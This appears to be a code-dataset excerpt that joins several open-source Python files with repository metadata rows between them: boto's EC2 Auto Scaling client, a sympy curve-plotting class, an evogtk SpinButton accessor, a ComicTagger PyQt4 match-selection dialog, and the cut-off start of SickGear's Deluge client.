# Copyright (c) 2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
This module provides an interface to the Elastic Compute Cloud (EC2)
Auto Scaling service.
"""
import base64
import boto
from boto.connection import AWSQueryConnection
from boto.ec2.regioninfo import RegionInfo
from boto.ec2.autoscale.request import Request
from boto.ec2.autoscale.launchconfig import LaunchConfiguration
from boto.ec2.autoscale.group import AutoScalingGroup
from boto.ec2.autoscale.group import ProcessType
from boto.ec2.autoscale.activity import Activity
from boto.ec2.autoscale.policy import AdjustmentType
from boto.ec2.autoscale.policy import MetricCollectionTypes
from boto.ec2.autoscale.policy import ScalingPolicy
from boto.ec2.autoscale.policy import TerminationPolicies
from boto.ec2.autoscale.instance import Instance
from boto.ec2.autoscale.scheduled import ScheduledUpdateGroupAction
from boto.ec2.autoscale.tag import Tag
RegionData = {
'us-east-1': 'autoscaling.us-east-1.amazonaws.com',
'us-west-1': 'autoscaling.us-west-1.amazonaws.com',
'us-west-2': 'autoscaling.us-west-2.amazonaws.com',
'sa-east-1': 'autoscaling.sa-east-1.amazonaws.com',
'eu-west-1': 'autoscaling.eu-west-1.amazonaws.com',
'ap-northeast-1': 'autoscaling.ap-northeast-1.amazonaws.com',
'ap-southeast-1': 'autoscaling.ap-southeast-1.amazonaws.com',
'ap-southeast-2': 'autoscaling.ap-southeast-2.amazonaws.com',
}
def regions():
"""
Get all available regions for the Auto Scaling service.
:rtype: list
:return: A list of :class:`boto.RegionInfo` instances
"""
regions = []
for region_name in RegionData:
region = RegionInfo(name=region_name,
endpoint=RegionData[region_name],
connection_cls=AutoScaleConnection)
regions.append(region)
return regions
def connect_to_region(region_name, **kw_params):
"""
Given a valid region name, return a
:class:`boto.ec2.autoscale.AutoScaleConnection`.
:param str region_name: The name of the region to connect to.
:rtype: :class:`boto.ec2.AutoScaleConnection` or ``None``
:return: A connection to the given region, or None if an invalid region
name is given
"""
for region in regions():
if region.name == region_name:
return region.connect(**kw_params)
return None
class AutoScaleConnection(AWSQueryConnection):
APIVersion = boto.config.get('Boto', 'autoscale_version', '2011-01-01')
DefaultRegionEndpoint = boto.config.get('Boto', 'autoscale_endpoint',
'autoscaling.us-east-1.amazonaws.com')
DefaultRegionName = boto.config.get('Boto', 'autoscale_region_name',
'us-east-1')
def __init__(self, aws_access_key_id=None, aws_secret_access_key=None,
is_secure=True, port=None, proxy=None, proxy_port=None,
proxy_user=None, proxy_pass=None, debug=0,
https_connection_factory=None, region=None, path='/',
security_token=None, validate_certs=True):
"""
Init method to create a new connection to the AutoScaling service.
B{Note:} The host argument is overridden by the host specified in the
boto configuration file.
"""
if not region:
region = RegionInfo(self, self.DefaultRegionName,
self.DefaultRegionEndpoint,
AutoScaleConnection)
self.region = region
AWSQueryConnection.__init__(self, aws_access_key_id,
aws_secret_access_key,
is_secure, port, proxy, proxy_port,
proxy_user, proxy_pass,
self.region.endpoint, debug,
https_connection_factory, path=path,
security_token=security_token,
validate_certs=validate_certs)
def _required_auth_capability(self):
return ['hmac-v4']
def build_list_params(self, params, items, label):
"""
Items is a list of dictionaries or strings::
[
{
'Protocol' : 'HTTP',
'LoadBalancerPort' : '80',
'InstancePort' : '80'
},
..
] etc.
or::
['us-east-1b',...]
"""
# different from EC2 list params
for i in xrange(1, len(items) + 1):
if isinstance(items[i - 1], dict):
for k, v in items[i - 1].iteritems():
if isinstance(v, dict):
for kk, vv in v.iteritems():
params['%s.member.%d.%s.%s' % (label, i, k, kk)] = vv
else:
params['%s.member.%d.%s' % (label, i, k)] = v
elif isinstance(items[i - 1], basestring):
params['%s.member.%d' % (label, i)] = items[i - 1]
def _update_group(self, op, as_group):
params = {'AutoScalingGroupName': as_group.name,
'LaunchConfigurationName': as_group.launch_config_name,
'MinSize': as_group.min_size,
'MaxSize': as_group.max_size}
# get availability zone information (required param)
zones = as_group.availability_zones
self.build_list_params(params, zones, 'AvailabilityZones')
if as_group.desired_capacity:
params['DesiredCapacity'] = as_group.desired_capacity
if as_group.vpc_zone_identifier:
params['VPCZoneIdentifier'] = as_group.vpc_zone_identifier
if as_group.health_check_period:
params['HealthCheckGracePeriod'] = as_group.health_check_period
if as_group.health_check_type:
params['HealthCheckType'] = as_group.health_check_type
if as_group.default_cooldown:
params['DefaultCooldown'] = as_group.default_cooldown
if as_group.placement_group:
params['PlacementGroup'] = as_group.placement_group
if as_group.termination_policies:
self.build_list_params(params, as_group.termination_policies,
'TerminationPolicies')
if op.startswith('Create'):
# you can only associate load balancers with an autoscale
# group at creation time
if as_group.load_balancers:
self.build_list_params(params, as_group.load_balancers,
'LoadBalancerNames')
if as_group.tags:
for i, tag in enumerate(as_group.tags):
tag.build_params(params, i + 1)
return self.get_object(op, params, Request)
def create_auto_scaling_group(self, as_group):
"""
Create auto scaling group.
"""
return self._update_group('CreateAutoScalingGroup', as_group)
def delete_auto_scaling_group(self, name, force_delete=False):
"""
Deletes the specified auto scaling group if the group has no instances
and no scaling activities in progress.
"""
if(force_delete):
params = {'AutoScalingGroupName': name, 'ForceDelete': 'true'}
else:
params = {'AutoScalingGroupName': name}
return self.get_object('DeleteAutoScalingGroup', params, Request)
def create_launch_configuration(self, launch_config):
"""
Creates a new Launch Configuration.
:type launch_config: :class:`boto.ec2.autoscale.launchconfig.LaunchConfiguration`
:param launch_config: LaunchConfiguration object.
"""
params = {'ImageId': launch_config.image_id,
'LaunchConfigurationName': launch_config.name,
'InstanceType': launch_config.instance_type}
if launch_config.key_name:
params['KeyName'] = launch_config.key_name
if launch_config.user_data:
params['UserData'] = base64.b64encode(launch_config.user_data)
if launch_config.kernel_id:
params['KernelId'] = launch_config.kernel_id
if launch_config.ramdisk_id:
params['RamdiskId'] = launch_config.ramdisk_id
if launch_config.block_device_mappings:
self.build_list_params(params, launch_config.block_device_mappings,
'BlockDeviceMappings')
if launch_config.security_groups:
self.build_list_params(params, launch_config.security_groups,
'SecurityGroups')
if launch_config.instance_monitoring:
params['InstanceMonitoring.Enabled'] = 'true'
else:
params['InstanceMonitoring.Enabled'] = 'false'
if launch_config.spot_price is not None:
params['SpotPrice'] = str(launch_config.spot_price)
if launch_config.instance_profile_name is not None:
params['IamInstanceProfile'] = launch_config.instance_profile_name
if launch_config.ebs_optimized:
params['EbsOptimized'] = 'true'
else:
params['EbsOptimized'] = 'false'
return self.get_object('CreateLaunchConfiguration', params,
Request, verb='POST')
def create_scaling_policy(self, scaling_policy):
"""
Creates a new Scaling Policy.
:type scaling_policy: :class:`boto.ec2.autoscale.policy.ScalingPolicy`
:param scaling_policy: ScalingPolicy object.
"""
params = {'AdjustmentType': scaling_policy.adjustment_type,
'AutoScalingGroupName': scaling_policy.as_name,
'PolicyName': scaling_policy.name,
'ScalingAdjustment': scaling_policy.scaling_adjustment}
if scaling_policy.cooldown is not None:
params['Cooldown'] = scaling_policy.cooldown
return self.get_object('PutScalingPolicy', params, Request)
def delete_launch_configuration(self, launch_config_name):
"""
Deletes the specified LaunchConfiguration.
The specified launch configuration must not be attached to an Auto
Scaling group. Once this call completes, the launch configuration is no
longer available for use.
"""
params = {'LaunchConfigurationName': launch_config_name}
return self.get_object('DeleteLaunchConfiguration', params, Request)
def get_all_groups(self, names=None, max_records=None, next_token=None):
"""
Returns a full description of each Auto Scaling group in the given
list. This includes all Amazon EC2 instances that are members of the
group. If a list of names is not provided, the service returns the full
details of all Auto Scaling groups.
This action supports pagination by returning a token if there are more
pages to retrieve. To get the next page, call this action again with
the returned token as the NextToken parameter.
:type names: list
:param names: List of group names which should be searched for.
:type max_records: int
:param max_records: Maximum amount of groups to return.
:rtype: list
:returns: List of :class:`boto.ec2.autoscale.group.AutoScalingGroup`
instances.
"""
params = {}
if max_records:
params['MaxRecords'] = max_records
if next_token:
params['NextToken'] = next_token
if names:
self.build_list_params(params, names, 'AutoScalingGroupNames')
return self.get_list('DescribeAutoScalingGroups', params,
[('member', AutoScalingGroup)])
def get_all_launch_configurations(self, **kwargs):
"""
Returns a full description of the launch configurations given the
specified names.
If no names are specified, then the full details of all launch
configurations are returned.
:type names: list
:param names: List of configuration names which should be searched for.
:type max_records: int
:param max_records: Maximum amount of configurations to return.
:type next_token: str
:param next_token: If you have more results than can be returned
at once, pass in this parameter to page through all results.
:rtype: list
:returns: List of
:class:`boto.ec2.autoscale.launchconfig.LaunchConfiguration`
instances.
"""
params = {}
max_records = kwargs.get('max_records', None)
names = kwargs.get('names', None)
if max_records is not None:
params['MaxRecords'] = max_records
if names:
self.build_list_params(params, names, 'LaunchConfigurationNames')
next_token = kwargs.get('next_token')
if next_token:
params['NextToken'] = next_token
return self.get_list('DescribeLaunchConfigurations', params,
[('member', LaunchConfiguration)])
def get_all_activities(self, autoscale_group, activity_ids=None,
max_records=None, next_token=None):
"""
Get all activities for the given autoscaling group.
This action supports pagination by returning a token if there are more
pages to retrieve. To get the next page, call this action again with
the returned token as the NextToken parameter
:type autoscale_group: str or
:class:`boto.ec2.autoscale.group.AutoScalingGroup` object
:param autoscale_group: The auto scaling group to get activities on.
:type max_records: int
:param max_records: Maximum amount of activities to return.
:rtype: list
:returns: List of
:class:`boto.ec2.autoscale.activity.Activity` instances.
"""
name = autoscale_group
if isinstance(autoscale_group, AutoScalingGroup):
name = autoscale_group.name
params = {'AutoScalingGroupName': name}
if max_records:
params['MaxRecords'] = max_records
if next_token:
params['NextToken'] = next_token
if activity_ids:
self.build_list_params(params, activity_ids, 'ActivityIds')
return self.get_list('DescribeScalingActivities',
params, [('member', Activity)])
def get_termination_policies(self):
"""Gets all valid termination policies.
These values can then be used as the termination_policies arg
when creating and updating autoscale groups.
"""
return self.get_object('DescribeTerminationPolicyTypes',
{}, TerminationPolicies)
def delete_scheduled_action(self, scheduled_action_name,
autoscale_group=None):
"""
Deletes a previously scheduled action.
:type scheduled_action_name: str
:param scheduled_action_name: The name of the action you want
to delete.
:type autoscale_group: str
:param autoscale_group: The name of the autoscale group.
"""
params = {'ScheduledActionName': scheduled_action_name}
if autoscale_group:
params['AutoScalingGroupName'] = autoscale_group
return self.get_status('DeleteScheduledAction', params)
def terminate_instance(self, instance_id, decrement_capacity=True):
"""
Terminates the specified instance. The desired group size can
also be adjusted, if desired.
:type instance_id: str
:param instance_id: The ID of the instance to be terminated.
:type decrement_capability: bool
:param decrement_capacity: Whether to decrement the size of the
autoscaling group or not.
"""
params = {'InstanceId': instance_id}
if decrement_capacity:
params['ShouldDecrementDesiredCapacity'] = 'true'
else:
params['ShouldDecrementDesiredCapacity'] = 'false'
return self.get_object('TerminateInstanceInAutoScalingGroup', params,
Activity)
def delete_policy(self, policy_name, autoscale_group=None):
"""
Delete a policy.
:type policy_name: str
:param policy_name: The name or ARN of the policy to delete.
:type autoscale_group: str
:param autoscale_group: The name of the autoscale group.
"""
params = {'PolicyName': policy_name}
if autoscale_group:
params['AutoScalingGroupName'] = autoscale_group
return self.get_status('DeletePolicy', params)
def get_all_adjustment_types(self):
return self.get_list('DescribeAdjustmentTypes', {},
[('member', AdjustmentType)])
def get_all_autoscaling_instances(self, instance_ids=None,
max_records=None, next_token=None):
"""
Returns a description of each Auto Scaling instance in the instance_ids
list. If a list is not provided, the service returns the full details
of all instances up to a maximum of fifty.
This action supports pagination by returning a token if there are more
pages to retrieve. To get the next page, call this action again with
the returned token as the NextToken parameter.
:type instance_ids: list
:param instance_ids: List of Autoscaling Instance IDs which should be
searched for.
:type max_records: int
:param max_records: Maximum number of results to return.
:rtype: list
:returns: List of
:class:`boto.ec2.autoscale.instance.Instance` objects.
"""
params = {}
if instance_ids:
self.build_list_params(params, instance_ids, 'InstanceIds')
if max_records:
params['MaxRecords'] = max_records
if next_token:
params['NextToken'] = next_token
return self.get_list('DescribeAutoScalingInstances',
params, [('member', Instance)])
def get_all_metric_collection_types(self):
"""
Returns a list of metrics and a corresponding list of granularities
for each metric.
"""
return self.get_object('DescribeMetricCollectionTypes',
{}, MetricCollectionTypes)
def get_all_policies(self, as_group=None, policy_names=None,
max_records=None, next_token=None):
"""
Returns descriptions of what each policy does. This action supports
pagination. If the response includes a token, there are more records
available. To get the additional records, repeat the request with the
response token as the NextToken parameter.
If no group name or list of policy names are provided, all
available policies are returned.
:type as_name: str
:param as_name: The name of the
:class:`boto.ec2.autoscale.group.AutoScalingGroup` to filter for.
:type names: list
:param names: List of policy names which should be searched for.
:type max_records: int
:param max_records: Maximum amount of groups to return.
"""
params = {}
if as_group:
params['AutoScalingGroupName'] = as_group
if policy_names:
self.build_list_params(params, policy_names, 'PolicyNames')
if max_records:
params['MaxRecords'] = max_records
if next_token:
params['NextToken'] = next_token
return self.get_list('DescribePolicies', params,
[('member', ScalingPolicy)])
def get_all_scaling_process_types(self):
"""
Returns scaling process types for use in the ResumeProcesses and
SuspendProcesses actions.
"""
return self.get_list('DescribeScalingProcessTypes', {},
[('member', ProcessType)])
def suspend_processes(self, as_group, scaling_processes=None):
"""
Suspends Auto Scaling processes for an Auto Scaling group.
:type as_group: string
:param as_group: The auto scaling group to suspend processes on.
:type scaling_processes: list
:param scaling_processes: Processes you want to suspend. If omitted,
all processes will be suspended.
"""
params = {'AutoScalingGroupName': as_group}
if scaling_processes:
self.build_list_params(params, scaling_processes,
'ScalingProcesses')
return self.get_status('SuspendProcesses', params)
def resume_processes(self, as_group, scaling_processes=None):
"""
Resumes Auto Scaling processes for an Auto Scaling group.
:type as_group: string
:param as_group: The auto scaling group to resume processes on.
:type scaling_processes: list
:param scaling_processes: Processes you want to resume. If omitted, all
processes will be resumed.
"""
params = {'AutoScalingGroupName': as_group}
if scaling_processes:
self.build_list_params(params, scaling_processes,
'ScalingProcesses')
return self.get_status('ResumeProcesses', params)
def create_scheduled_group_action(self, as_group, name, time=None,
desired_capacity=None,
min_size=None, max_size=None,
start_time=None, end_time=None,
recurrence=None):
"""
Creates a scheduled scaling action for a Auto Scaling group. If you
leave a parameter unspecified, the corresponding value remains
unchanged in the affected Auto Scaling group.
:type as_group: string
:param as_group: The auto scaling group to get activities on.
:type name: string
:param name: Scheduled action name.
:type time: datetime.datetime
:param time: The time for this action to start. (Depracated)
:type desired_capacity: int
:param desired_capacity: The number of EC2 instances that should
be running in this group.
:type min_size: int
:param min_size: The minimum size for the new auto scaling group.
:type max_size: int
:param max_size: The minimum size for the new auto scaling group.
:type start_time: datetime.datetime
:param start_time: The time for this action to start. When StartTime and EndTime are specified with Recurrence, they form the boundaries of when the recurring action will start and stop.
:type end_time: datetime.datetime
:param end_time: The time for this action to end. When StartTime and EndTime are specified with Recurrence, they form the boundaries of when the recurring action will start and stop.
:type recurrence: string
:param recurrence: The time when recurring future actions will start. Start time is specified by the user following the Unix cron syntax format. EXAMPLE: '0 10 * * *'
"""
params = {'AutoScalingGroupName': as_group,
'ScheduledActionName': name}
if start_time is not None:
params['StartTime'] = start_time.isoformat()
if end_time is not None:
params['EndTime'] = end_time.isoformat()
if recurrence is not None:
params['Recurrence'] = recurrence
if time:
params['Time'] = time.isoformat()
if desired_capacity is not None:
params['DesiredCapacity'] = desired_capacity
if min_size is not None:
params['MinSize'] = min_size
if max_size is not None:
params['MaxSize'] = max_size
return self.get_status('PutScheduledUpdateGroupAction', params)
def get_all_scheduled_actions(self, as_group=None, start_time=None,
end_time=None, scheduled_actions=None,
max_records=None, next_token=None):
params = {}
if as_group:
params['AutoScalingGroupName'] = as_group
if scheduled_actions:
self.build_list_params(params, scheduled_actions,
'ScheduledActionNames')
if max_records:
params['MaxRecords'] = max_records
if next_token:
params['NextToken'] = next_token
return self.get_list('DescribeScheduledActions', params,
[('member', ScheduledUpdateGroupAction)])
def disable_metrics_collection(self, as_group, metrics=None):
"""
Disables monitoring of group metrics for the Auto Scaling group
specified in AutoScalingGroupName. You can specify the list of affected
metrics with the Metrics parameter.
"""
params = {'AutoScalingGroupName': as_group}
if metrics:
self.build_list_params(params, metrics, 'Metrics')
return self.get_status('DisableMetricsCollection', params)
def enable_metrics_collection(self, as_group, granularity, metrics=None):
"""
Enables monitoring of group metrics for the Auto Scaling group
specified in AutoScalingGroupName. You can specify the list of enabled
metrics with the Metrics parameter.
Auto scaling metrics collection can be turned on only if the
InstanceMonitoring.Enabled flag, in the Auto Scaling group's launch
configuration, is set to true.
:type autoscale_group: string
:param autoscale_group: The auto scaling group to get activities on.
:type granularity: string
:param granularity: The granularity to associate with the metrics to
collect. Currently, the only legal granularity is "1Minute".
:type metrics: string list
:param metrics: The list of metrics to collect. If no metrics are
specified, all metrics are enabled.
"""
params = {'AutoScalingGroupName': as_group,
'Granularity': granularity}
if metrics:
self.build_list_params(params, metrics, 'Metrics')
return self.get_status('EnableMetricsCollection', params)
def execute_policy(self, policy_name, as_group=None, honor_cooldown=None):
params = {'PolicyName': policy_name}
if as_group:
params['AutoScalingGroupName'] = as_group
if honor_cooldown:
params['HonorCooldown'] = honor_cooldown
return self.get_status('ExecutePolicy', params)
def put_notification_configuration(self, autoscale_group, topic, notification_types):
"""
Configures an Auto Scaling group to send notifications when
specified events take place.
:type as_group: str or
:class:`boto.ec2.autoscale.group.AutoScalingGroup` object
:param as_group: The Auto Scaling group to put notification
configuration on.
:type topic: str
:param topic: The Amazon Resource Name (ARN) of the Amazon Simple
Notification Service (SNS) topic.
:type notification_types: list
:param notification_types: The type of events that will trigger
the notification.
"""
name = autoscale_group
if isinstance(autoscale_group, AutoScalingGroup):
name = autoscale_group.name
params = {'AutoScalingGroupName': name,
'TopicARN': topic}
self.build_list_params(params, notification_types, 'NotificationTypes')
return self.get_status('PutNotificationConfiguration', params)
def set_instance_health(self, instance_id, health_status,
should_respect_grace_period=True):
"""
Explicitly set the health status of an instance.
:type instance_id: str
:param instance_id: The identifier of the EC2 instance.
:type health_status: str
:param health_status: The health status of the instance.
"Healthy" means that the instance is healthy and should remain
in service. "Unhealthy" means that the instance is unhealthy.
Auto Scaling should terminate and replace it.
:type should_respect_grace_period: bool
:param should_respect_grace_period: If True, this call should
respect the grace period associated with the group.
"""
params = {'InstanceId': instance_id,
'HealthStatus': health_status}
if should_respect_grace_period:
params['ShouldRespectGracePeriod'] = 'true'
else:
params['ShouldRespectGracePeriod'] = 'false'
return self.get_status('SetInstanceHealth', params)
def set_desired_capacity(self, group_name, desired_capacity, honor_cooldown=False):
"""
Adjusts the desired size of the AutoScalingGroup by initiating scaling
activities. When reducing the size of the group, it is not possible to define
which Amazon EC2 instances will be terminated. This applies to any Auto Scaling
decisions that might result in terminating instances.
:type group_name: string
:param group_name: name of the auto scaling group
:type desired_capacity: integer
:param desired_capacity: new capacity setting for auto scaling group
:type honor_cooldown: boolean
:param honor_cooldown: by default, overrides any cooldown period
"""
params = {'AutoScalingGroupName': group_name,
'DesiredCapacity': desired_capacity}
if honor_cooldown:
params['HonorCooldown'] = json.dumps('True')
return self.get_status('SetDesiredCapacity', params)
# Tag methods
def get_all_tags(self, filters=None, max_records=None, next_token=None):
"""
Lists the Auto Scaling group tags.
This action supports pagination by returning a token if there
are more pages to retrieve. To get the next page, call this
action again with the returned token as the NextToken
parameter.
:type filters: dict
:param filters: The value of the filter type used to identify
the tags to be returned. NOT IMPLEMENTED YET.
:type max_records: int
:param max_records: Maximum number of tags to return.
:rtype: list
:returns: List of :class:`boto.ec2.autoscale.tag.Tag`
instances.
"""
params = {}
if max_records:
params['MaxRecords'] = max_records
if next_token:
params['NextToken'] = next_token
return self.get_list('DescribeTags', params,
[('member', Tag)])
def create_or_update_tags(self, tags):
"""
Creates new tags or updates existing tags for an Auto Scaling group.
:type tags: List of :class:`boto.ec2.autoscale.tag.Tag`
:param tags: The new or updated tags.
"""
params = {}
for i, tag in enumerate(tags):
tag.build_params(params, i + 1)
return self.get_status('CreateOrUpdateTags', params, verb='POST')
def delete_tags(self, tags):
"""
Deletes existing tags for an Auto Scaling group.
:type tags: List of :class:`boto.ec2.autoscale.tag.Tag`
:param tags: The new or updated tags.
"""
params = {}
for i, tag in enumerate(tags):
tag.build_params(params, i + 1)
return self.get_status('DeleteTags', params, verb='POST')
| mit |
18padx08/PPTex | PPTexEnv_x86_64/lib/python2.7/site-packages/sympy/plotting/pygletplot/plot_curve.py | 25 | 2853 | from __future__ import print_function, division
from pyglet.gl import *
from plot_mode_base import PlotModeBase
from sympy.core import S
from sympy.core.compatibility import xrange
class PlotCurve(PlotModeBase):
style_override = 'wireframe'
def _on_calculate_verts(self):
self.t_interval = self.intervals[0]
self.t_set = list(self.t_interval.frange())
self.bounds = [[S.Infinity, -S.Infinity, 0],
[S.Infinity, -S.Infinity, 0],
[S.Infinity, -S.Infinity, 0]]
evaluate = self._get_evaluator()
self._calculating_verts_pos = 0.0
self._calculating_verts_len = float(self.t_interval.v_len)
self.verts = list()
b = self.bounds
for t in self.t_set:
try:
_e = evaluate(t) # calculate vertex
except (NameError, ZeroDivisionError):
_e = None
if _e is not None: # update bounding box
for axis in range(3):
b[axis][0] = min([b[axis][0], _e[axis]])
b[axis][1] = max([b[axis][1], _e[axis]])
self.verts.append(_e)
self._calculating_verts_pos += 1.0
for axis in range(3):
b[axis][2] = b[axis][1] - b[axis][0]
if b[axis][2] == 0.0:
b[axis][2] = 1.0
self.push_wireframe(self.draw_verts(False))
def _on_calculate_cverts(self):
if not self.verts or not self.color:
return
def set_work_len(n):
self._calculating_cverts_len = float(n)
def inc_work_pos():
self._calculating_cverts_pos += 1.0
set_work_len(1)
self._calculating_cverts_pos = 0
self.cverts = self.color.apply_to_curve(self.verts,
self.t_set,
set_len=set_work_len,
inc_pos=inc_work_pos)
self.push_wireframe(self.draw_verts(True))
def calculate_one_cvert(self, t):
vert = self.verts[t]
return self.color(vert[0], vert[1], vert[2],
self.t_set[t], None)
def draw_verts(self, use_cverts):
def f():
glBegin(GL_LINE_STRIP)
for t in xrange(len(self.t_set)):
p = self.verts[t]
if p is None:
glEnd()
glBegin(GL_LINE_STRIP)
continue
if use_cverts:
c = self.cverts[t]
if c is None:
c = (0, 0, 0)
glColor3f(*c)
else:
glColor3f(*self.default_wireframe_color)
glVertex3f(*p)
glEnd()
return f
| mit |
R3v1L/evogtk | evogtk/gui/accessclasslib/spinbutton.py | 2 | 1871 | # -*- coding: utf-8 -*-
###############################################################################
# Copyright (C) 2008 EVO Sistemas Libres <[email protected]>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# checkbutton
# EVOGTK Access class for gtk.CheckButton, gtk.ToggleButton, gtk.ToggleAction widgets
###############################################################################
# GTK Imports
import gtk
# DBWidgets imports
from evogtk.widgets import DBSpinButton
class AccessClass:
"""
Class for gtk.SpinButton
"""
def supported_widgets(self):
"""
Supported widgets for this access class
"""
return [gtk.Adjustment,gtk.SpinButton,DBSpinButton]
def supported_types(self):
"""
Supported types for this access class
"""
return [int,float]
def set_content(self,widget,content):
"""
Method for setting the widget content
"""
widget.set_value(content)
def get_content(self,widget):
"""
Method for setting the widget content
"""
return widget.get_value()
| mit |
2mny/mylar | lib/comictaggerlib/matchselectionwindow.py | 1 | 4989 | """
A PyQT4 dialog to select from automated issue matches
"""
"""
Copyright 2012-2014 Anthony Beville
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
import os
from PyQt4 import QtCore, QtGui, uic
from PyQt4.QtCore import QUrl, pyqtSignal, QByteArray
from imagefetcher import ImageFetcher
from settings import ComicTaggerSettings
from comicarchive import MetaDataStyle
from coverimagewidget import CoverImageWidget
from comicvinetalker import ComicVineTalker
import utils
class MatchSelectionWindow(QtGui.QDialog):
volume_id = 0
def __init__(self, parent, matches, comic_archive):
super(MatchSelectionWindow, self).__init__(parent)
uic.loadUi(ComicTaggerSettings.getUIFile('matchselectionwindow.ui' ), self)
self.altCoverWidget = CoverImageWidget( self.altCoverContainer, CoverImageWidget.AltCoverMode )
gridlayout = QtGui.QGridLayout( self.altCoverContainer )
gridlayout.addWidget( self.altCoverWidget )
gridlayout.setContentsMargins(0,0,0,0)
self.archiveCoverWidget = CoverImageWidget( self.archiveCoverContainer, CoverImageWidget.ArchiveMode )
gridlayout = QtGui.QGridLayout( self.archiveCoverContainer )
gridlayout.addWidget( self.archiveCoverWidget )
gridlayout.setContentsMargins(0,0,0,0)
utils.reduceWidgetFontSize( self.twList )
utils.reduceWidgetFontSize( self.teDescription, 1 )
self.setWindowFlags(self.windowFlags() |
QtCore.Qt.WindowSystemMenuHint |
QtCore.Qt.WindowMaximizeButtonHint)
self.matches = matches
self.comic_archive = comic_archive
self.twList.currentItemChanged.connect(self.currentItemChanged)
self.twList.cellDoubleClicked.connect(self.cellDoubleClicked)
self.updateData()
def updateData( self):
self.setCoverImage()
self.populateTable()
self.twList.resizeColumnsToContents()
self.twList.selectRow( 0 )
path = self.comic_archive.path
self.setWindowTitle( u"Select correct match: {0}".format(
os.path.split(path)[1] ))
def populateTable( self ):
while self.twList.rowCount() > 0:
self.twList.removeRow(0)
self.twList.setSortingEnabled(False)
row = 0
for match in self.matches:
self.twList.insertRow(row)
item_text = match['series']
item = QtGui.QTableWidgetItem(item_text)
item.setData( QtCore.Qt.ToolTipRole, item_text )
item.setData( QtCore.Qt.UserRole, (match,))
item.setFlags(QtCore.Qt.ItemIsSelectable| QtCore.Qt.ItemIsEnabled)
self.twList.setItem(row, 0, item)
if match['publisher'] is not None:
item_text = u"{0}".format(match['publisher'])
else:
item_text = u"Unknown"
item = QtGui.QTableWidgetItem(item_text)
item.setData( QtCore.Qt.ToolTipRole, item_text )
item.setFlags(QtCore.Qt.ItemIsSelectable| QtCore.Qt.ItemIsEnabled)
self.twList.setItem(row, 1, item)
month_str = u""
year_str = u"????"
if match['month'] is not None:
month_str = u"-{0:02d}".format(int(match['month']))
if match['year'] is not None:
year_str = u"{0}".format(match['year'])
item_text = year_str + month_str
item = QtGui.QTableWidgetItem(item_text)
item.setData( QtCore.Qt.ToolTipRole, item_text )
item.setFlags(QtCore.Qt.ItemIsSelectable| QtCore.Qt.ItemIsEnabled)
self.twList.setItem(row, 2, item)
item_text = match['issue_title']
if item_text is None:
item_text = ""
item = QtGui.QTableWidgetItem(item_text)
item.setData( QtCore.Qt.ToolTipRole, item_text )
item.setFlags(QtCore.Qt.ItemIsSelectable| QtCore.Qt.ItemIsEnabled)
self.twList.setItem(row, 3, item)
row += 1
self.twList.resizeColumnsToContents()
self.twList.setSortingEnabled(True)
self.twList.sortItems( 2 , QtCore.Qt.AscendingOrder )
self.twList.selectRow(0)
self.twList.resizeColumnsToContents()
self.twList.horizontalHeader().setStretchLastSection(True)
def cellDoubleClicked( self, r, c ):
self.accept()
def currentItemChanged( self, curr, prev ):
if curr is None:
return
if prev is not None and prev.row() == curr.row():
return
self.altCoverWidget.setIssueID( self.currentMatch()['issue_id'] )
if self.currentMatch()['description'] is None:
self.teDescription.setText ( "" )
else:
self.teDescription.setText ( self.currentMatch()['description'] )
def setCoverImage( self ):
self.archiveCoverWidget.setArchive( self.comic_archive)
def currentMatch( self ):
row = self.twList.currentRow()
match = self.twList.item(row, 0).data( QtCore.Qt.UserRole ).toPyObject()[0]
return match
| gpl-3.0 |
p0psicles/SickGear | sickbeard/clients/deluge.py | 3 | 8261 | # Author: Mr_Orange <[email protected]>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickGear.
#
# SickGear is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickGear is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickGear. If not, see <http://www.gnu.org/licenses/>.
import json
from base64 import b64encode
import sickbeard
from sickbeard import logger
from sickbeard.clients.generic import GenericClient
from lib.requests.exceptions import RequestException
class DelugeAPI(GenericClient):
def __init__(self, host=None, username=None, password=None):
super(DelugeAPI, self).__init__('Deluge', host, username, password)
self.url = self.host + 'json'
def _get_auth(self):
post_data = json.dumps({'method': 'auth.login',
